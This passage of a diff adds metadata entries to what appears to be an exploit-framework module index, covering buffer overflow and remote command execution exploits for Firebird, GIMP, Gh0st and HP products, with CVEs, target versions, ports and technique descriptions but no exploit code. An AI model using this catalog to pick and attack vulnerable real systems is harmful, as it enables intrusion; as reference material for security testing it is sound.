], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/eureka_mail_err.rb", + "is_install_path": true, + "ref_name": "windows/misc/eureka_mail_err", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_cnct_group": { + "name": "Firebird Relational Database CNCT Group Number Buffer Overflow", + "fullname": "exploit/windows/misc/fb_cnct_group", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-31", + "type": "exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module exploits a vulnerability in Firebird SQL Server. A specially\n crafted packet can be sent which will overwrite a pointer allowing the attacker to\n control where data is read from. Shortly, following the controlled read, the\n pointer is called resulting in code execution.\n\n The vulnerability exists with a group number extracted from the CNCT information,\n which is sent by the client, and whose size is not properly checked.\n\n This module uses an existing call to memcpy, just prior to the vulnerable code,\n which allows a small amount of data to be written to the stack. A two-phases\n stack pivot allows to execute the ROP chain which ultimately is used to execute\n VirtualAlloc and bypass DEP.", + "references": [ + "CVE-2013-2492", + "OSVDB-91044" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows FB 2.5.2.26539", + "Windows FB 2.5.1.26351", + "Windows FB 2.1.5.18496", + "Windows FB 2.1.4.18393", + "Debug" + ], + "mod_time": "2018-10-27 20:54:14 +0000", + "path": "/modules/exploits/windows/misc/fb_cnct_group.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_cnct_group", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_isc_attach_database": { + "name": "Firebird Relational Database isc_attach_database() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_isc_attach_database", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38607", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/fb_isc_attach_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_isc_attach_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_isc_create_database": { + "name": "Firebird Relational Database isc_create_database() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_isc_create_database", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38606", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/fb_isc_create_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_isc_create_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/fb_svc_attach": { + "name": "Firebird Relational Database SVC_attach() Buffer Overflow", + "fullname": "exploit/windows/misc/fb_svc_attach", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38605", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/fb_svc_attach.rb", + "is_install_path": true, + "ref_name": "windows/misc/fb_svc_attach", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/gh0st": { + "name": "Gh0st Client buffer Overflow", + "fullname": "exploit/windows/misc/gh0st", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-07-27", + "type": "exploit", + "author": [ + "Professor Plum" + ], + "description": "This module exploits a Memory buffer overflow in the Gh0st client (C2 server)", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Gh0st Beta 3.6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/gh0st.rb", + "is_install_path": true, + "ref_name": "windows/misc/gh0st", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/gimp_script_fu": { + "name": "GIMP script-fu Server Buffer Overflow", + "fullname": "exploit/windows/misc/gimp_script_fu", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-18", + "type": "exploit", + "author": [ + "Joseph Sheridan", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in the script-fu server\n component on GIMP <= 2.6.12. By sending a specially crafted packet, an\n attacker may be able to achieve remote code execution under the context\n of the user.\n\n This module has been tested on GIMP for Windows from installers\n provided by Jernej Simoncic.", + "references": [ + "CVE-2012-2763", + "OSVDB-82429", + "BID-53741", + "EDB-18956", + "URL-http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html" + ], + "platform": "Windows", + "arch": "", + "rport": 10008, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", + "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/gimp_script_fu.rb", + "is_install_path": true, + "ref_name": "windows/misc/gimp_script_fu", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_cmd_exec": { + "name": "HP Data Protector 8.10 Remote Command Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_cmd_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-11-02", + "type": "exploit", + "author": [ + "Christian Ramirez", + "Henoch Barrera", + "Matthew Hall " + ], + "description": "This module exploits a remote command execution on HP Data Protector 8.10. Arbitrary\n commands can be executed by sending crafted requests with opcode 28 to the OmniInet\n service listening on the TCP/5555 port. Since there is a strict length limitation on\n the command, rundll32.exe is executed, and the payload is provided through a DLL by a\n fake SMB server. This module has been tested successfully on HP Data Protector 8.1 on\n Windows 7 SP1.", + "references": [ + "CVE-2014-2623", + "OSVDB-109069", + "EDB-34066", + "URL-https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 8.10 / Windows" + ], + "mod_time": "2022-02-15 18:03:13 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_cmd_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_crs": { + "name": "HP Data Protector Cell Request Service Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_crs", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-03", + "type": "exploit", + "author": [ + "e6af8de8b1d4b2b6d5ba2610cbf9cd38", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector\n product. The vulnerability, due to the insecure usage of _swprintf, exists at the Cell\n Request Service (crs.exe) when parsing packets with opcode 211. This module has been tested\n successfully on HP Data Protector 6.20 and 7.00 on Windows XP SP3.", + "references": [ + "CVE-2013-2333", + "OSVDB-93867", + "BID-60309", + "ZDI-13-130" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "HP Data Protector 6.20 build 370 / Windows XP SP3", + "HP Data Protector 7.00 build 72 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_crs.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_crs", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_dtbclslogin": { + "name": "HP Data Protector DtbClsLogin Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_dtbclslogin", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-09", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in HP Data Protector 4.0 SP1. The\n overflow occurs during the login process, in the DtbClsLogin function provided by\n the dpwindtb.dll component, where the Utf8Cpy (strcpy like function) is used in an\n insecure way with the username. A successful exploitation will lead to code execution\n with the privileges of the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server\n Service) process, which runs as SYSTEM by default.", + "references": [ + "CVE-2010-3007", + "OSVDB-67973", + "BID-43105", + "ZDI-10-174", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02498535" + ], + "platform": "Windows", + "arch": "", + "rport": 3817, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_dtbclslogin", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_encrypted_comms": { + "name": "HP Data Protector Encrypted Communication Remote Command Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_encrypted_comms", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-04-18", + "type": "exploit", + "author": [ + "Jon Barg", + "Ian Lovering" + ], + "description": "This module exploits a well known remote code execution exploit after establishing encrypted\n control communications with a Data Protector agent. This allows exploitation of Data\n Protector agents that have been configured to only use encrypted control communications.\n\n This exploit works by executing the payload with Microsoft PowerShell so will only work\n against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows\n Server 2008 R2.", + "references": [ + "CVE-2016-2004", + "URL-http://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_encrypted_comms", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_exec_bar": { + "name": "HP Data Protector Backup Client Service Remote Code Execution", + "fullname": "exploit/windows/misc/hp_dataprotector_exec_bar", + "aliases": [], + "rank": 600, + "disclosure_date": "2014-01-02", + "type": "exploit", + "author": [ + "Aniway.Anyway ", + "juan vazquez " + ], + "description": "This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code\n execution. The vulnerability exists in the EXEC_BAR operation, which allows to\n execute arbitrary processes. This module has been tested successfully on HP Data\n Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.", + "references": [ + "CVE-2013-2347", + "BID-64647", + "ZDI-14-008", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422", + "URL-http://ddilabs.blogspot.com/2014/02/fun-with-hp-data-protector-execbar.html" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.20 build 370 / VBScript CMDStager", + "HP Data Protector 6.20 build 370 / Powershell" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_exec_bar", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_install_service": { + "name": "HP Data Protector 6.10/6.11/6.20 Install Service", + "fullname": "exploit/windows/misc/hp_dataprotector_install_service", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-02", + "type": "exploit", + "author": [ + "Ben Turner" + ], + "description": "This module exploits HP Data Protector OmniInet process on Windows only.\n This exploit invokes the install service function which allows an attacker to create a\n custom payload in the format of an executable.\n\n To ensure this works, the SMB server created in MSF must have a share called Omniback\n which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\", + "references": [ + "CVE-2011-0922", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.10/6.11/6.20 / Windows" + ], + "mod_time": "2022-05-11 12:40:43 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_install_service.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_install_service", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_new_folder": { + "name": "HP Data Protector Create New Folder Buffer Overflow", + "fullname": "exploit/windows/misc/hp_dataprotector_new_folder", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-03-12", + "type": "exploit", + "author": [ + "juan vazquez ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in HP Data Protector 5. The overflow\n occurs in the creation of new folders, where the name of the folder is handled in a\n insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the\n folder name is split in fragments in this insecure copy. Because of this, this module\n uses egg hunting to search a non corrupted copy of the payload in the heap. On the other\n hand the overflowed buffer is stored in a frame protected by stack cookies, because of\n this SEH handler overwrite is used.\n\n Any user of HP Data Protector Express is able to create new folders and trigger the\n vulnerability. Moreover, in the default installation the 'Admin' user has an empty\n password. Successful exploitation will lead to code execution with the privileges of\n the \"dpwinsdr.exe\" (HP Data Protector Express Domain Server Service) process, which\n runs as SYSTEM by default.", + "references": [ + "CVE-2012-0124", + "OSVDB-80105", + "BID-52431", + "URL-https://www.rapid7.com/blog/post/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124" + ], + "platform": "Windows", + "arch": "", + "rport": 3817, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", + "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_new_folder", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_dataprotector_traversal": { + "name": "HP Data Protector Backup Client Service Directory Traversal", + "fullname": "exploit/windows/misc/hp_dataprotector_traversal", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-01-02", + "type": "exploit", + "author": [ + "Brian Gorenc", + "juan vazquez " + ], + "description": "This module exploits a directory traversal vulnerability in the Hewlett-Packard Data\n Protector product. The vulnerability exists in the Backup Client Service (OmniInet.exe)\n and is triggered when parsing packets with opcode 42. This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.", + "references": [ + "CVE-2013-6194", + "OSVDB-101630", + "BID-64647", + "ZDI-14-003", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector 6.20 build 370 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_dataprotector_traversal", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": { + "name": "HPE iMC dbman RestartDB Unauthenticated RCE", + "fullname": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "sztivi", + "Chris Lyne", + "bcoles " + ], + "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", + "references": [ + "CVE-2017-5816", + "EDB-43198", + "ZDI-17-340", + "BID-98469", + "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" + ], + "platform": "Windows", + "arch": "", + "rport": 2810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": { + "name": "HPE iMC dbman RestoreDBase Unauthenticated RCE", + "fullname": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "sztivi", + "Chris Lyne", + "bcoles " + ], + "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", + "references": [ + "CVE-2017-5817", + "EDB-43195", + "ZDI-17-341", + "BID-98469", + "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" + ], + "platform": "Windows", + "arch": "", + "rport": 2810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_imc_uam": { + "name": "HP Intelligent Management Center UAM Buffer Overflow", + "fullname": "exploit/windows/misc/hp_imc_uam", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-29", + "type": "exploit", + "author": [ + "e6af8de8b1d4b2b6d5ba2610cbf9cd38", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2012-3274", + "OSVDB-85060", + "BID-55271", + "ZDI-12-171", + "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863" + ], + "platform": "Windows", + "arch": "", + "rport": 1811, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_imc_uam.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_imc_uam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_loadrunner_magentproc": { + "name": "HP LoadRunner magentproc.exe Overflow", + "fullname": "exploit/windows/misc/hp_loadrunner_magentproc", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-07-27", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2013-4800", + "OSVDB-95644", + "ZDI-13-169" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / HP LoadRunner 11.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_loadrunner_magentproc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": { + "name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", + "fullname": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-05-06", + "type": "exploit", + "author": [ + "Unknown", + "aushack " + ], + "description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).", + "references": [ + "CVE-2010-1549", + "ZDI-10-080", + "BID-39965", + "URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968" + ], + "platform": "Windows", + "arch": "", + "rport": 54345, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows (Dropper)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_magentservice": { + "name": "HP Diagnostics Server magentservice.exe Overflow", + "fullname": "exploit/windows/misc/hp_magentservice", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-01-12", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "hal" + ], + "description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. Originally found and posted by\n AbdulAziz Harir via ZDI.", + "references": [ + "OSVDB-72815", + "CVE-2011-4789", + "ZDI-12-016" + ], + "platform": "Windows", + "arch": "", + "rport": 23472, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Diagnostics Server 9.10" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_magentservice.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_magentservice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_1": { + "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_1", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-17", + "type": "exploit", + "author": [ + "EgiX ", + "Fairuzan Roslan ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the first one.", + "references": [ + "CVE-2007-2280", + "BID-37396", + "OSVDB-61206", + "ZDI-09-099" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", + "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", + "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", + "HP Application Recovery Manager software A.06.10: INET, internal build 282" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_1.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_1", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_2": { + "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_2", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-17", + "type": "exploit", + "author": [ + "EgiX ", + "Fairuzan Roslan ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). However, this module only\n exploits the second one.", + "references": [ + "CVE-2009-3844", + "BID-37250", + "OSVDB-60852", + "ZDI-09-091" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", + "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", + "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", + "HP Application Recovery Manager software A.06.10: INET, internal build 282" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_2.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_2", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_3": { + "name": "HP OmniInet.exe Opcode 27 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_3", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-06-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2011-1865", + "OSVDB-73571", + "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_3.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_3", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_4": { + "name": "HP OmniInet.exe Opcode 20 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_4", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-06-29", + "type": "exploit", + "author": [ + "Oren Isacson", + "muts", + "dookie", + "sinn3r ", + "corelanc0d3r " + ], + 